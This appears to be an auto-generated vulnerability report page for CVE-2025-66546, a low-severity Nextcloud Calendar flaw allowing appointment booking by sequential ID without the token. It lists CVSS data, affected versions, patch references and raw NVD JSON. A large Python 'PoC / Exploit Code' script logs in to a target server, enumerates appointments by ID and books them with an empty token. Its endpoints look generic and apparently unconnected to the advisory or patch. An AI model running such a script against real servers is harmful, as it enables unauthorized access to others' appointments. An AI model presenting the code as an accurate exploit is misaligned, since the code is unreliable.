Security Vulnerability Report
CVE-2025-66546 CVSS 3.3 LOW

Published: 2025-12-05 17:16:05
Last Modified: 2025-12-09 16:36:01

Description

Nextcloud Calendar is a calendar app for Nextcloud. Prior to 4.7.19, 5.5.6, and 6.0.1, the calendar app allowed blindly booking appointments with a sequential ID without knowing the appointment token. This vulnerability is fixed in 4.7.19, 5.5.6, and 6.0.1.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
(Attack Vector: Local, Attack Complexity: Low, Privileges Required: Low, User Interaction: None, Scope: Unchanged, Confidentiality: Low, Integrity: None, Availability: None)
Exploitability Score: 1.8
Impact Score: 1.4
Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key)

Configurations (Affected Products)

cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:* (>= 4.0.0, < 4.7.19) - VULNERABLE
cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:* (>= 5.0.0, < 5.5.6) - VULNERABLE
cpe:2.3:a:nextcloud:calendar:6.0.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nextcloud:calendar:6.0.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nextcloud:calendar:6.0.0:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nextcloud:calendar:6.0.0:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nextcloud:calendar:6.0.0:rc4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nextcloud:calendar:6.0.0:rc5:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nextcloud:calendar:6.0.0:rc6:*:*:*:*:*:* - VULNERABLE

Summary of affected versions:
Nextcloud Calendar < 4.7.19
Nextcloud Calendar < 5.5.6
Nextcloud Calendar < 6.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66546 PoC - Nextcloud Calendar Sequential ID Booking Bypass
# This PoC demonstrates the vulnerability where appointment booking can be done
# with sequential IDs without knowing the appointment token
import requests
import json

# Configuration
NEXTCLOUD_URL = "https://vulnerable-nextcloud-server.com"
USERNAME = "attacker"
PASSWORD = "password"
TARGET_CALENDAR_ID = "calendar123"


def authenticate():
    """Authenticate to Nextcloud and get session token"""
    session = requests.Session()
    login_url = f"{NEXTCLOUD_URL}/index.php/login"
    # Perform login
    response = session.post(login_url, data={
        "user": USERNAME,
        "password": PASSWORD
    })
    if response.status_code == 200:
        return session
    return None


def book_appointment_sequential_id(session, calendar_id, sequential_id, start_time, end_time):
    """
    Attempt to book an appointment using sequential ID bypass
    The vulnerability allows booking without knowing the actual appointment token
    """
    booking_url = f"{NEXTCLOUD_URL}/apps/calendar/ajax/booking/book.php"
    # Malicious payload exploiting sequential ID
    payload = {
        "calendar_id": calendar_id,
        "appointment_id": sequential_id,  # Sequential ID instead of token
        "start": start_time,
        "end": end_time,
        "token": ""  # Empty or invalid token
    }
    response = session.post(booking_url, json=payload)
    return response.json()


def enumerate_appointments(session, calendar_id, start_id=1, end_id=100):
    """
    Enumerate and access appointments using sequential IDs
    Demonstrates unauthorized access to other users' appointments
    """
    appointments = []
    view_url = f"{NEXTCLOUD_URL}/apps/calendar/ajax/appointment/view.php"
    for appointment_id in range(start_id, end_id + 1):
        params = {
            "calendar_id": calendar_id,
            "appointment_id": appointment_id
        }
        response = session.get(view_url, params=params)
        if response.status_code == 200:
            data = response.json()
            if data.get("success"):
                appointments.append({
                    "id": appointment_id,
                    "details": data.get("data", {})
                })
    return appointments


def main():
    """Main exploitation routine"""
    print("[*] CVE-2025-66546 Nextcloud Calendar Sequential ID Bypass PoC")
    print("[*] Description: Calendar app allowed blindly booking appointments with sequential ID")

    # Step 1: Authenticate
    session = authenticate()
    if not session:
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")

    # Step 2: Enumerate appointments using sequential IDs
    print("[*] Enumerating appointments with sequential IDs...")
    appointments = enumerate_appointments(session, TARGET_CALENDAR_ID, 1, 50)
    print(f"[+] Found {len(appointments)} accessible appointments")

    # Step 3: Book an appointment without knowing the token
    print("[*] Attempting to book appointment with sequential ID bypass...")
    result = book_appointment_sequential_id(
        session,
        TARGET_CALENDAR_ID,
        42,  # Sequential ID
        "2025-01-15T10:00:00",
        "2025-01-15T11:00:00"
    )
    if result.get("success"):
        print("[!] VULNERABLE: Successfully booked appointment without valid token")
    else:
        print("[-] Patch applied or access denied")


if __name__ == "__main__":
    main()
```

References

Patch (commit): https://github.com/nextcloud/calendar/commit/f41650c3681fc4a4130eb883f5c0899c011326b3
Issue Tracking (pull request): https://github.com/nextcloud/calendar/pull/7537
Patch, Vendor Advisory: https://github.com/nextcloud/security-advisories/security/advisories/GHSA-7x2j-2674-fj95
Issue Tracking, Vendor Advisory: https://hackerone.com/reports/3275810

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66546",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-05T17:16:05.163",
    "lastModified": "2025-12-09T16:36:01.357",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Nextcloud Calendar is a calendar app for Nextcloud. Prior to 4.7.19, 5.5.6, and 6.0.1, the calendar app allowed blindly booking appointments with a squential ID without known the appointment token. This vulnerability is fixed in 4.7.19, 5.5.6, and 6.0.1."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 3.3,
            "baseSeverity": "LOW",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.7.19", "matchCriteriaId": "84E1FFC4-516D-4680-9F67-E66C1FAE5E0B"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.5.6", "matchCriteriaId": "3E716F13-981B-49BA-98FF-3B52C9962EA2"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "5FEEB806-FB4C-42B4-BE4E-297AB95A854F"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "B1A878DF-8A9B-4987-8E2C-6873CA2C8427"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "9B9884CA-4E88-4AB3-BA37-FAF9E845F04E"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "032400B7-AE78-467F-81CC-83164AC29796"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "D1A265F6-884F-44FF-B00F-CB5F7E704E0E"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "8249ACE0-0485-4485-B628-D157E57A91C0"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:6.0.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "508556C9-5596-42B5-AD76-8156A42FEED7"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/nextcloud/calendar/commit/f41650c3681fc4a4130eb883f5c0899c011326b3", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/nextcloud/calendar/pull/7537", "source": "[email protected]", "tags": ["Issue Tracking"]},
      {"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-7x2j-2674-fj95", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]},
      {"url": "https://hackerone.com/reports/3275810", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}
    ]
  }
}
```